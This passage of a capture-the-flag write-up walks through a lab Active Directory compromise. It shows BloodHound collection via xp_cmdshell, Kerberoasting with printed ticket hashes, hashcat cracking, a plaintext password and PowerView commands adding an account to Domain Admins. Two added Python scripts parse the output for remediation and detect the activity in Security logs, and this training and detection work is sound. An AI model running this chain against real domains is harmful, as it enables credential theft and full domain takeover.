I was having trouble downloading SharpHound.exe through xp_cmdshell, so I downloaded SharpHound.exe as the administrator user over WinRM and granted all users read and execute permission on it, so that I could run the collector as a domain user.
icacls C:/windows/temp/SharpHound.exe /grant:r "Users:(RX)"
SQL (ctflover dbo@POO_PUBLIC)> xp_cmdshell C:\windows\temp\SharpHound.exe -c all --OutputDirectory C:\windows\temp
BloodHound results (screenshot): shortest path from a Kerberoastable user.
The p00_adm user, as a member of the Help Desk group, has GenericAll rights over the Domain Admins group. This means that with p00_adm's credentials we can add any user to Domain Admins.
I'll use Kerberoasting to get its hash.
I uploaded Invoke-Kerberoast.ps1 to the target system using Evil-WinRM: https://github.com/EmpireProject/Empire/blob/master/data/module_source/credentials/Invoke-Kerberoast.ps1
SQL (ctflover dbo@POO_PUBLIC)> xp_cmdshell powershell -c import-module c:\programdata\invoke-kerberoast.ps1; invoke-kerberoast -outputformat hashcat
output -------------------------------------------------------------------------------- NULL
NULL
TicketByteHexStream :
Hash : $krb5tgs$23$*p00_hr$intranet.poo$HR_peoplesoft/intranet.poo:1433*$D1480EFA5BDD4B210E74CBDC43C35E
86$7B8F30DD38B4BDB7C0F6F2E9DF2F8C423165B813DB3E3129CFDD4EBE18A67C423270CBC9A0F30A2D954A972B6BFCE
F4370D8D2101163DA3A769A933F36E0BF544DC438B5390AD0705D05D997F16CFCDE88DDE7B182D8F59FE5FD7B81EB9A0
8DCCE0DFBB8799B77A9D02329ADECAE24A9D207955C8E3F4208B08F7E4DC9EEBA7D84E7A63AE1AAF86A6E17FCE972DD1
BEC11226C9FDFA62A3B81D3A90D5B7CFD9D8A1212939D70A3F633A506051C6D07388B608263F74CEEB4048760E05500A
B6EE947C0924AD56E8A442D0B6557627EADF19B3FFB059319C7CCE9EA03D08A82376A007AD3460862F20C7327A541812
DA695DEC1735508B726BF85AA9A95BD92925FE3F98FE3E9228598137294F606B5944BF563D669595C0593210413A8876
DB34AED573E61982DF0374E0533BCC14E89387090D3D0F490A7469067A6CF7F67795FE558275BFE2174C95D045007098
B2D69E93FAF8AF7EFF6F5579F2E07A5F20CD77EB2B57A6D6397068C0D61760D2C479162DC8D0D367BD0773F5436F571C
ECD6B06A97F5CBF8A67E85B4FCF9A4FE1E6432D95279B8992F8467951099C16983A80F88821764F969F42E091C77489C
A5251F67E993C12DF904787EA63D51F073793E7E2BC118066D34BA0F8DD776B163B5D0F353F08AE147A67A235884B017
019FA597A80DE37CE0B474738DC2523DE7D085AA10025662ACEC5DD5D7DEE35DB992050E3F3195A1F5DA8017F99D2782
FF8EBAF59B116F1AB86326CDE150FF6029FD385142AE4DE72F8851588EAC8712E442554178D83DBDBD1C517EC432054C
FF8A960AE4DBAE7F51B289ADD98132563F5B8483F808C5F15788EEF5A2FA48993F44F24B77BBC46F9EDA2A6F37CB537E
E668CE3C227A1C093980E0EE66B3877401916BC4CB2CC348E7999CAEFBB0ABC1C43C04487706C5A70FBEEC8212F9C23E
8A2439044108E65CBFF54A72DD115F7198CD298199DF8CF5A360368E787FC80085D6FB5043438ED9F9B5557D6DA2C920
FCE77B3650C6A5390EBCE1179F734D468C1AB4D3679E593FAB343BE86A750DA5913FB4191625A12A55C2ECD3A9F85D2D
691B4CF51FC7E4E718DD712DE8F00312C973ADDA2836A0FC2E3D308D7C31146519C339ADB3F22282A04D13191F3B9416
52CA7C3A7DAC402979470E8CC421D1757A46C14027E0A0FFDA1C838365C965A6895F8D38FA449A058FE81545E6668EB8
AC7144D0B31B69FACDE97953D777658B000ADC1931F4D22838B4A6EF007FE3246A0F6A848386EA7F3B245151B1FA7A19
09B40725F923A7AF675CA12D3B2A90FD85CD20470E35325AAAAD43BF4FF638DBAFC58FE6724EC8544DB115D488A86FB1
A4E57D8495D6CF71FD6DF788AAE7344779C2765609602D9D79801A5D19FFAAB4F1E64D7CA2B132441AB9E7941D0E9E3F
28292376F167C89140BC8C4B72386912C772BFA4445572F28F6F485C5F74B68C1C237CDCC3FC7C688866068F613A0
SamAccountName : p00_hr
DistinguishedName : CN=p00_hr,CN=Users,DC=intranet,DC=poo
ServicePrincipalName : HR_peoplesoft/intranet.poo:1433
NULL
TicketByteHexStream :
Hash : $krb5tgs$23$*p00_adm$intranet.poo$cyber_audit/intranet.poo:443*$3385AADE3C46663245ACD404C3C112BA
$D9B22A406EE35D62A75BB61CBC821DA9AFFC8ADB60D81D672C29A765BAA1F6F589C9AB89A5B8731C6764DFEB1778676
D3330FDBA15C32CF2F9BED94EB365B97B05F039F56F3BE6A0009C22834807FDED5F6B08CDC97DA626E13E96620C404FB
2099A8F7D6B7CD0AAA43EDC4EB287E19CE99B03315172D094E305E81A69B63E72BB435E5EAB7F854117B167088E7DA2E
9FA08EE123C6AFD6A5D572AEC221A5AC94AF56A2902F12BD18299E8872EC756D835D5B38F3CB04F0C9470D65C3AA7BC5
C2D699DCD1985313B8B249877CCDFD9B28BF476EFEBF8CF74AAD4E67A6B9799B9A6248775E18ACCD1B8D46264DF91265
967C93026743F71107797F9F1CF3084E32C952410CCB2A9A5CF2B5717C88F98E21A82E5411D2217020704F0247E55B02
EE03F4E913DB93D372AAEA160A50DF79E31F02543A24228372D942DFED8F48221600F5CCF72E5FA7630AEE7F19E2FCAC
DEE45974206085F82E9E0B5CE423E88ADBE133121A59A10B9C66E7BA43C8A9510B22B869139A31ABF28635F596388B46
3FEDC5819678C6659FE6F25D59227F6C26C0D6B5BAF8C3E32D21A028B4D5CF100040321AE52949098BAE6DF68478D342
1073D53EE65CCE0A2B4F702FA1EB6FBDC714771E82C4923FC14585FE081A1EAD12370756D1AF5428E47AAEEDFAADF180
D95190A904D60D5B88B22DF3FC03AEB4950869A60B9E9F3DC298902B9B3736487183E9BAB5B598A619A25C2AF7488676
667D48A8346C39C3BE0D364F239400ADE97986B373D32ABB487C693FCF5D814735B63CAEE5838A04B1B6EACF240C95F0
924CFEBA8A58B755F74C364678BE790F082AE59E0A1B884753679633E2EF510B7752D64B2406440480975015F2DB7C6E
669DBE78F3AD783A044CC07812A1E9F1C3C2C9C5310AE781B87CD69E29BDECC8095347322C7EC5F245D265F2E6A032E8
C66FD1A8367B39A5669F4F4F16E05A3E85BE8B2A060102343362901B1D48DB4A27D4AA5F259A71A8D29EE8DACE65D45C
77E92CFD696801EFE39B4D2C1F9E1A5D473047E599D3643EB67C8E13E3A53E5A8E2CBB73452BA5B421F91B81DC88E4BA
6CAB76FFE11FD622F02AE9E0CB2A028F8B9FA1A66D4BFC4919492A56730F9BB0F2D057EE918AEF0363D536B5DBDA7ECC
F2AA6219F4403378C78977FCBD2D7C6481D9CC9CBF6EC4BD29816CB15BBA93ED83E7587DFE3FEFE7AF1B2CCA48A900D3
84987BEFBC65541509421EDD336A703A455502E6F93B9F8FEEE5928E5D64771BC47DDFCB95F68AF9A0889E68367770D6
2D58106ED23A7705192DC8AD8A789630ED67A20555862072F5755E91BA398DD73CD01FDFBC2A047EB514E5DBDDAF93B9
69C3EA15BAA45F0B0E3C5F6A4A384DFD6B11D2431C6083F5CC3A2672684A4BBF9BBFD1896B11F1E89597C3671BFD2355
1A73381B2BD6A32DE01D5504140CDF7E9F4AB2722838344918F0E42432DDF277CAE2CD7F0DEB85E8A99AA3A0254
SamAccountName : p00_adm
DistinguishedName : CN=p00_adm,CN=Users,DC=intranet,DC=poo
ServicePrincipalName : cyber_audit/intranet.poo:443
NULL
NULL
NULL
I removed the extra spaces and newlines from the hash and then tried to crack it with hashcat:
hashcat hash /usr/share/seclists/Passwords/Keyboard-Combinations.txt
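The Invoke-Kerberoast output above comes back through xp_cmdshell with each hash wrapped over many lines, which is why the whitespace had to be stripped before the file was usable. As an added example (not part of the original writeup), the script below re-joins that layout and turns it into the defender-side view of the same data: which accounts carry SPNs, and which of them were issued RC4 (etype 23) tickets and therefore need an AES-only setting, a long random password or a gMSA. The sample output is constructed with placeholder hex; the account names, SPNs and realm in it are made up.

```python
import re
from dataclasses import dataclass

# Constructed sample (placeholder hex, not real ticket data) in the layout that
# Invoke-Kerberoast -OutputFormat hashcat prints when it comes back through
# xp_cmdshell: the long hash line is wrapped, and records are separated by NULL.
SAMPLE_OUTPUT = """\
TicketByteHexStream :
Hash : $krb5tgs$23$*svc_sql$example.local$MSSQLSvc/db01.example.local:1433*$0123456789ABCDEF0123456789ABCDEF
$FEDCBA9876543210FEDCBA9876543210
ABCDEF0123456789ABCDEF0123456789
SamAccountName : svc_sql
DistinguishedName : CN=svc_sql,CN=Users,DC=example,DC=local
ServicePrincipalName : MSSQLSvc/db01.example.local:1433
NULL
TicketByteHexStream :
Hash : $krb5tgs$18$svc_web$EXAMPLE.LOCAL$*HTTP/web01.example.local*$00112233445566778899AABBCCDDEEFF
$FFEEDDCCBBAA99887766554433221100
SamAccountName : svc_web
ServicePrincipalName : HTTP/web01.example.local
NULL
"""

# "$krb5tgs$<etype>$" followed by "*user$realm$spn*$" (RC4, hashcat mode 13100)
# or "user$realm$*spn*$" (AES, modes 19600/19700).
HEADER_RE = re.compile(r"^\$krb5tgs\$(\d+)\$\*?([^$*]+)\$([^$*]+)\$\*?([^$*]+)\*\$")
# A wrapped continuation line is nothing but hex, optionally led by a "$" separator.
CONT_RE = re.compile(r"^\$?[0-9A-Fa-f]+$")

ETYPE_NAMES = {23: "RC4-HMAC", 17: "AES128-CTS-HMAC-SHA1-96", 18: "AES256-CTS-HMAC-SHA1-96"}


@dataclass
class RoastedAccount:
    account: str
    realm: str
    spn: str
    etype: int

    @property
    def uses_rc4(self) -> bool:
        return self.etype == 23


def join_wrapped_hashes(text: str):
    """Yield each hash as one whitespace-free string, re-joining console-wrapped lines."""
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("Hash :"):
            if current:
                yield current
            current = line[len("Hash :"):].strip()
        elif current is not None and CONT_RE.match(line):
            current += line
        else:
            if current:
                yield current
            current = None
    if current:
        yield current


def parse_kerberoast_output(text: str) -> list:
    """Extract account, realm, SPN and encryption type from each hash header."""
    found = []
    for h in join_wrapped_hashes(text):
        m = HEADER_RE.match(h)
        if m:
            etype, user, realm, spn = m.groups()
            found.append(RoastedAccount(user, realm, spn, int(etype)))
    return found


def remediation_report(text: str) -> dict:
    """Map each SPN-bearing account to the fix a defender would schedule for it."""
    report = {}
    for acct in parse_kerberoast_output(text):
        name = ETYPE_NAMES.get(acct.etype, f"etype {acct.etype}")
        if acct.uses_rc4:
            action = ("ticket issued with RC4: set msDS-SupportedEncryptionTypes to AES only, "
                      "rotate to a long random password, or move the SPN to a gMSA")
        else:
            action = "ticket issued with AES: confirm the password is long, random and rotated"
        report[acct.account] = f"{acct.spn} ({name}): {action}"
    return report


if __name__ == "__main__":
    for account, advice in remediation_report(SAMPLE_OUTPUT).items():
        print(f"{account}: {advice}")
```

The header regex accepts both the RC4 form seen in this writeup and the AES form, so the same parser works on output from a domain that has already moved its service accounts to AES; an account that still shows up with etype 23 is the one to fix first.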
Adding p00_adm to Domain Admins.
If you have not turned off the antivirus, you'll have problems.
*Evil-WinRM* PS C:\windows\temp> Import-Module ./Powerview.ps1
*Evil-WinRM* PS C:\windows\temp> $pass = ConvertTo-SecureString 'ZQ!5t4r' -AsPlainText -Force
*Evil-WinRM* PS C:\windows\temp> $cred = New-Object System.Management.Automation.PSCredential('intranet.poo\p00_adm', $pass)
*Evil-WinRM* PS C:\windows\temp> Add-DomainGroupMember -Identity 'Domain Admins' -Members 'p00_adm' -Credential $cred
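Both steps of this chain, the service-ticket requests behind the Kerberoast and the Add-DomainGroupMember call, leave records in the domain controller's Security log (event 4769 for the TGS requests, event 4728 for the addition to a global group such as Domain Admins). As an added example that is not part of the original writeup, the script below runs two detections over constructed sample events: a client that obtains RC4 (0x17) service tickets for several distinct user accounts in a short window, and any membership change on a Tier-0 group. The event records, the IP addresses and the timestamps are made up; the field names follow the EventData of those two event IDs.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample Security-log events (field names as in the EventData of
# 4769 and 4728; values are made up). They model what the steps above leave
# behind: a burst of RC4 service-ticket requests from one client, then a
# membership change on Domain Admins.
EVENTS = [
    {"EventID": 4769, "Time": "2024-01-01T10:00:01", "IpAddress": "10.0.0.5",
     "TargetUserName": "ctflover@INTRANET.POO", "ServiceName": "p00_hr",
     "TicketEncryptionType": "0x17"},
    {"EventID": 4769, "Time": "2024-01-01T10:00:02", "IpAddress": "10.0.0.5",
     "TargetUserName": "ctflover@INTRANET.POO", "ServiceName": "p00_adm",
     "TicketEncryptionType": "0x17"},
    # Normal traffic: an AES ticket for one service, and a computer account.
    {"EventID": 4769, "Time": "2024-01-01T10:00:03", "IpAddress": "10.0.0.9",
     "TargetUserName": "alice@INTRANET.POO", "ServiceName": "p00_hr",
     "TicketEncryptionType": "0x12"},
    {"EventID": 4769, "Time": "2024-01-01T10:00:04", "IpAddress": "10.0.0.5",
     "TargetUserName": "ctflover@INTRANET.POO", "ServiceName": "DC$",
     "TicketEncryptionType": "0x17"},
    {"EventID": 4728, "Time": "2024-01-01T10:30:00", "SubjectUserName": "p00_adm",
     "MemberName": "CN=p00_adm,CN=Users,DC=intranet,DC=poo",
     "TargetUserName": "Domain Admins"},
    {"EventID": 4728, "Time": "2024-01-01T11:00:00", "SubjectUserName": "admin",
     "MemberName": "CN=bob,CN=Users,DC=intranet,DC=poo",
     "TargetUserName": "Help Desk"},
]

RC4_HMAC = "0x17"
PRIVILEGED_GROUPS = {"Domain Admins", "Enterprise Admins", "Schema Admins", "Administrators"}
# Member added to a security-enabled global / local / universal group.
GROUP_CHANGE_EVENTS = {4728, 4732, 4756}


def kerberoast_bursts(events, threshold=2, window=timedelta(minutes=5)):
    """Return (client IP, service accounts) for every client that obtained RC4
    service tickets for at least `threshold` distinct user service accounts
    within `window`. Computer accounts (trailing "$") and krbtgt are ignored:
    they are not Kerberoasting targets and would only add noise."""
    by_client = defaultdict(list)
    for e in events:
        if (e["EventID"] == 4769 and e["TicketEncryptionType"] == RC4_HMAC
                and not e["ServiceName"].endswith("$") and e["ServiceName"] != "krbtgt"):
            by_client[e["IpAddress"]].append((datetime.fromisoformat(e["Time"]), e["ServiceName"]))
    alerts = []
    for ip, requests in sorted(by_client.items()):
        requests.sort()
        for start, _ in requests:
            names = {svc for t, svc in requests if start <= t <= start + window}
            if len(names) >= threshold:
                alerts.append((ip, sorted(names)))
                break
    return alerts


def privileged_group_changes(events):
    """Return (actor, member DN, group) for every addition to a Tier-0 group."""
    return [(e["SubjectUserName"], e["MemberName"], e["TargetUserName"])
            for e in events
            if e["EventID"] in GROUP_CHANGE_EVENTS and e["TargetUserName"] in PRIVILEGED_GROUPS]


if __name__ == "__main__":
    for ip, accounts in kerberoast_bursts(EVENTS):
        print(f"possible Kerberoast from {ip}: RC4 tickets for {', '.join(accounts)}")
    for actor, member, group in privileged_group_changes(EVENTS):
        print(f"{actor} added {member} to {group}")
```

The RC4 filter is what makes the first rule low-noise on a domain whose service accounts already use AES: legitimate clients then never request 0x17 tickets, so a single one is worth a look, and a burst across several accounts from one address is the classic Kerberoast shape. The second rule is deliberately unconditional; a Domain Admins change should always generate a ticket for a human to close.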
Now p00_adm is a Domain Admin, so it can access the C$ share on the DC.
*Evil-WinRM* PS C:\windows\temp> net use \\DC.intranet.poo\c$ /u:intranet.poo\p00_adm 'ZQ!5t4r'
The command completed successfully.
*Evil-WinRM* PS C:\windows\temp> type \\DC.intranet.poo\c$\users\mr3ks\desktop\flag.txt
POO{1196ef8bc523f084ad1732a3...}